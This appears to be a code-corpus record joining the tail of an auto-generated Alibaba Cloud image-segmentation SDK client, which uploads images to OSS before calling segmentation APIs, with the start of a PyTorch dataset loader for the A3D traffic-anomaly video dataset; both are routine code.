protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_skyreq = imageseg_20191230_models.SegmentSkyRequest(
)
RPCUtilClient.convert(request, segment_skyreq)
segment_skyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_sky_resp = self.segment_sky(segment_skyreq, runtime)
return segment_sky_resp
def get_async_job_result(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.GetAsyncJobResultResponse().from_map(self.do_request("GetAsyncJobResult", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_furniture(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentFurnitureResponse().from_map(self.do_request("SegmentFurniture", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_furniture_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_furniturereq = imageseg_20191230_models.SegmentFurnitureRequest(
)
RPCUtilClient.convert(request, segment_furniturereq)
segment_furniturereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_furniture_resp = self.segment_furniture(segment_furniturereq, runtime)
return segment_furniture_resp
def refine_mask(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.RefineMaskResponse().from_map(self.do_request("RefineMask", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def refine_mask_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
refine_maskreq = imageseg_20191230_models.RefineMaskRequest(
)
RPCUtilClient.convert(request, refine_maskreq)
refine_maskreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
refine_mask_resp = self.refine_mask(refine_maskreq, runtime)
return refine_mask_resp
def parse_face(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.ParseFaceResponse().from_map(self.do_request("ParseFace", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def parse_face_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
parse_facereq = imageseg_20191230_models.ParseFaceRequest(
)
RPCUtilClient.convert(request, parse_facereq)
parse_facereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
parse_face_resp = self.parse_face(parse_facereq, runtime)
return parse_face_resp
def segment_vehicle(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentVehicleResponse().from_map(self.do_request("SegmentVehicle", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_vehicle_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_vehiclereq = imageseg_20191230_models.SegmentVehicleRequest(
)
RPCUtilClient.convert(request, segment_vehiclereq)
segment_vehiclereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_vehicle_resp = self.segment_vehicle(segment_vehiclereq, runtime)
return segment_vehicle_resp
def segment_hair(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHairResponse().from_map(self.do_request("SegmentHair", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_hair_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_hairreq = imageseg_20191230_models.SegmentHairRequest(
)
RPCUtilClient.convert(request, segment_hairreq)
segment_hairreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_hair_resp = self.segment_hair(segment_hairreq, runtime)
return segment_hair_resp
def segment_face(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentFaceResponse().from_map(self.do_request("SegmentFace", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_face_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_facereq = imageseg_20191230_models.SegmentFaceRequest(
)
RPCUtilClient.convert(request, segment_facereq)
segment_facereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_face_resp = self.segment_face(segment_facereq, runtime)
return segment_face_resp
def segment_head(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHeadResponse().from_map(self.do_request("SegmentHead", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_head_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_headreq = imageseg_20191230_models.SegmentHeadRequest(
)
RPCUtilClient.convert(request, segment_headreq)
segment_headreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_head_resp = self.segment_head(segment_headreq, runtime)
return segment_head_resp
def segment_commodity(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentCommodityResponse().from_map(self.do_request("SegmentCommodity", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_commodity_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_commodityreq = imageseg_20191230_models.SegmentCommodityRequest(
)
RPCUtilClient.convert(request, segment_commodityreq)
segment_commodityreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_commodity_resp = self.segment_commodity(segment_commodityreq, runtime)
return segment_commodity_resp
def segment_body(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentBodyResponse().from_map(self.do_request("SegmentBody", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_body_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_bodyreq = imageseg_20191230_models.SegmentBodyRequest(
)
RPCUtilClient.convert(request, segment_bodyreq)
segment_bodyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_body_resp = self.segment_body(segment_bodyreq, runtime)
return segment_body_resp
def segment_common_image(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentCommonImageResponse().from_map(self.do_request("SegmentCommonImage", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_common_image_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_common_imagereq = imageseg_20191230_models.SegmentCommonImageRequest(
)
RPCUtilClient.convert(request, segment_common_imagereq)
segment_common_imagereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_common_image_resp = self.segment_common_image(segment_common_imagereq, runtime)
return segment_common_image_resp
def get_endpoint(self, product_id, region_id, endpoint_rule, network, suffix, endpoint_map, endpoint):
if not UtilClient.empty(endpoint):
return endpoint
if not UtilClient.is_unset(endpoint_map) and not UtilClient.empty(endpoint_map.get('regionId')):
return endpoint_map.get('regionId')
return EndpointUtilClient.get_endpoint_rules(product_id, region_id, endpoint_rule, network, suffix)
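# --- Usage sketch (editorial, not part of the auto-generated SDK) ---
# A minimal sketch of driving the client above, assuming valid AccessKey
# credentials. The SegmentAnimalAdvanceRequest model name and its
# image_urlobject field are inferred from the advance method above; all
# keys and paths here are hypothetical placeholders.
#
#   config = _rpc_models.Config(access_key_id='<ak>',
#                               access_key_secret='<sk>',
#                               type='access_key',
#                               region_id='cn-shanghai')
#   client = Client(config)
#   runtime = util_models.RuntimeOptions()
#   with open('animal.jpg', 'rb') as f:
#       req = imageseg_20191230_models.SegmentAnimalAdvanceRequest(image_urlobject=f)
#       resp = client.segment_animal_advance(req, runtime)
#   print(resp.to_map())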
| 44.656286 | 186 | 0.675026 | 4,281 | 38,717 | 5.692362 | 0.04555 | 0.076819 | 0.046945 | 0.036276 | 0.831836 | 0.812877 | 0.812877 | 0.812877 | 0.80943 | 0.80943 | 0 | 0.01498 | 0.244802 | 38,717 | 866 | 187 | 44.707852 | 0.818462 | 0.029858 | 0 | 0.689153 | 1 | 0 | 0.036007 | 0.008662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03836 | false | 0 | 0.017196 | 0 | 0.096561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4268e9d2f4cd636736ff2e06fe6899b8db20532 | 17,650 | py | Python | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | import torch
import torch.utils.data as data_utl
from torch.utils.data.dataloader import default_collate
from PIL import Image
import numpy as np
import json
import csv
import h5py
import os
import os.path
import cv2
import pdb
def video_to_tensor(pic):
"""Convert a ``numpy.ndarray`` to tensor.
Converts a numpy.ndarray (T x H x W x C)
to a torch.FloatTensor of shape (C x T x H x W)
Args:
pic (numpy.ndarray): Video to be converted to tensor.
Returns:
Tensor: Converted video.
"""
return torch.from_numpy(pic.transpose([3,0,1,2]))
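# Shape example for video_to_tensor: a 16-frame RGB clip stored as
# (T, H, W, C) comes back channel-first for I3D, e.g.
#   clip = np.zeros([16, 224, 224, 3], dtype=np.float32)
#   video_to_tensor(clip).shape  # torch.Size([3, 16, 224, 224])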
class A3D(data_utl.Dataset):
'''
A3D dataset for I3D
'''
def __init__(self,
split_file,
split,
root,
mode, transforms=None, horizontal_flip=None, save_dir='', seq_len=16, overlap=0):
self.split_file = split_file
self.transforms = transforms
self.mode = mode
self.root = root
self.save_dir = save_dir
self.seq_len = seq_len
self.overlap = overlap
self.fps = 10
        self.num_classes = 10 # 9 known anomaly types plus normal; 0 is normal, and 'unknown' (10) is skipped below
self.name_to_id = {'normal': 0,
'start_stop_or_stationary': 1,
'moving_ahead_or_waiting': 2,
'lateral': 3,
'oncoming': 4,
'turning': 5,
'pedestrian': 6,
'obstacle': 7,
'leave_to_right': 8,
'leave_to_left': 9,
'unknown': 10}
self.id_to_name = {v:k for k, v in self.name_to_id.items()}
if split == 'train':
self.data = self.make_train_dataset(split_file, split, root, mode)
print("Number of used video:", len(self.data))
elif split in ['val', 'test']:
self.data = self.make_test_dataset(split_file, split, root, mode)
def make_train_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
sample_category_stats = {v:0 for v in self.name_to_id.values()}
for idx, vid in enumerate(data.keys()):
            if data[vid]['video_start'] is None or \
                data[vid]['video_end'] is None or \
                data[vid]['anomaly_start'] is None or \
                data[vid]['anomaly_end'] is None:
                # NOTE: Sep 5, some videos have null annotation fields (an annotation bug); skip them for now
                continue
if data[vid]['subset'] != split:
continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
num_frames = data[vid]['num_frames']
if num_frames < self.seq_len:
continue
print("Training videos:", vid)
self.valid_videos.append(vid)
# NOTE: this is for the temporal label
# init label
labels = np.zeros([self.num_classes, num_frames], np.float32)
# normal label
labels[0, :data[vid]['anomaly_start']] = 1
# anomaly label
            labels[int(data[vid]['anomaly_class']),
                   data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1 # per-class anomaly label
# normal label
labels[0, data[vid]['anomaly_end']:] = 1
assert int(data[vid]['anomaly_class']) > 0
for t in range(0, num_frames, (self.seq_len - self.overlap)):
if num_frames - t < self.seq_len:
seq_start = num_frames - self.seq_len
seq_end = num_frames
else:
seq_start = t
seq_end = t + self.seq_len
# label = labels[:, seq_start: seq_end]
# NOTE: for original I3D, one clip has only one label
label = np.zeros(self.num_classes, np.float32)
# NOTE: method 1, assign the label of the middle frame
# middle_idx = int(seq_end-seq_start/2)
# if middle_idx >= data[vid]['anomaly_start'] and middle_idx < data[vid]['anomaly_end']:
# label[int(data[vid]['anomaly_class'])] = 1 # abnormal
# sample_category_stats[int(data[vid]['anomaly_class'])] += 1
# else:
# label[0] = 1 # normal
# sample_category_stats[0] += 1
# NOTE: method 2, assign the accident label if over 1/3 of the frames are abnormal
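                # Worked example: each frame column of `labels` is one-hot, so
                # labels[:, s:e].nonzero()[0] > 0 counts abnormal frames; with
                # seq_len=16 the threshold 16/3 ~ 5.33 means a window with 6 or
                # more abnormal frames gets the anomaly class, else it is normal.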
if sum(labels[:, seq_start:seq_end].nonzero()[0] > 0) >= self.seq_len/3:
label[int(data[vid]['anomaly_class'])] = 1 # abnormal
sample_category_stats[int(data[vid]['anomaly_class'])] += 1
else:
label[0] = 1 # normal
sample_category_stats[0] += 1
dataset.append({"vid": vid,
"label": label,
"start": seq_start, # NOTE: 0-index
"end": seq_end,# NOTE: 0-index
# "image_dir":
})
# if mode == 'flow':
# num_frames = num_frames//2
            # NOTE: limit to the first 10 videos, for overfitting experiments
            if idx >= 9:
                break
print("Number of samples of all categories:")
        for k, v in sample_category_stats.items():
            print('{}: {}'.format(self.id_to_name[k], v))
return dataset
def make_test_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
for idx, vid in enumerate(data.keys()):
            if data[vid]['video_start'] is None or \
                data[vid]['video_end'] is None or \
                data[vid]['anomaly_start'] is None or \
                data[vid]['anomaly_end'] is None:
                # NOTE: Sep 5, some videos have null annotation fields (an annotation bug); skip them for now
                continue
# if data[vid]['subset'] != split:
# continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
print("Validating videos:", vid)
num_frames = data[vid]['num_frames']
self.valid_videos.append(vid)
# # init label
# labels = np.zeros([self.num_classes, num_frames], np.float32)
# # normal label
# labels[0, :data[vid]['anomaly_start']] = 1
# # anomaly label
# labels[int(data[vid]['anomaly_class']),
# data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1
# # normal label
# labels[0, data[vid]['anomaly_end']:] = 1
# NOTE: for original I3D, one clip has only one label
label = np.zeros([self.num_classes], np.float32)
label[int(data[vid]['anomaly_class'])] = 1
dataset.append({"vid": vid,
"label": label,
"start": 0, # NOTE: 0-index
"end": num_frames# NOTE: 0-index
})
# if mode == 'flow':
# num_frames = num_frames//2
            if idx >= 9:
                break
return dataset
def load_rgb_frames(self, image_dir, vid, start, end):
frames = []
for i in range(start, end):
# img = cv2.imread(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))[:, :, [2, 1, 0]]
img = Image.open(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))
w,h = img.size
# if w < 226 or h < 226:
# d = 226.-min(w,h)
# sc = 1+d/min(w,h)
# img = cv2.resize(img,dsize=(0,0),fx=sc,fy=sc)
# img = (img/255.)*2 - 1
frames.append(img)
return frames #torch.stack(frames, dim=1)
    def load_flow_frames(self, image_dir, vid, start, end):
        # NOTE: re-enabled as a bound method because __getitem__ calls it in
        # 'flow' mode; loads precomputed x/y optical-flow JPEGs and rescales
        # pixel values to [-1, 1].
        frames = []
        for i in range(start, end):
            imgx = cv2.imread(os.path.join(image_dir, vid, vid+'-'+str(i).zfill(6)+'x.jpg'), cv2.IMREAD_GRAYSCALE)
            imgy = cv2.imread(os.path.join(image_dir, vid, vid+'-'+str(i).zfill(6)+'y.jpg'), cv2.IMREAD_GRAYSCALE)
            w, h = imgx.shape
            if w < 224 or h < 224:
                d = 224. - min(w, h)
                sc = 1 + d / min(w, h)
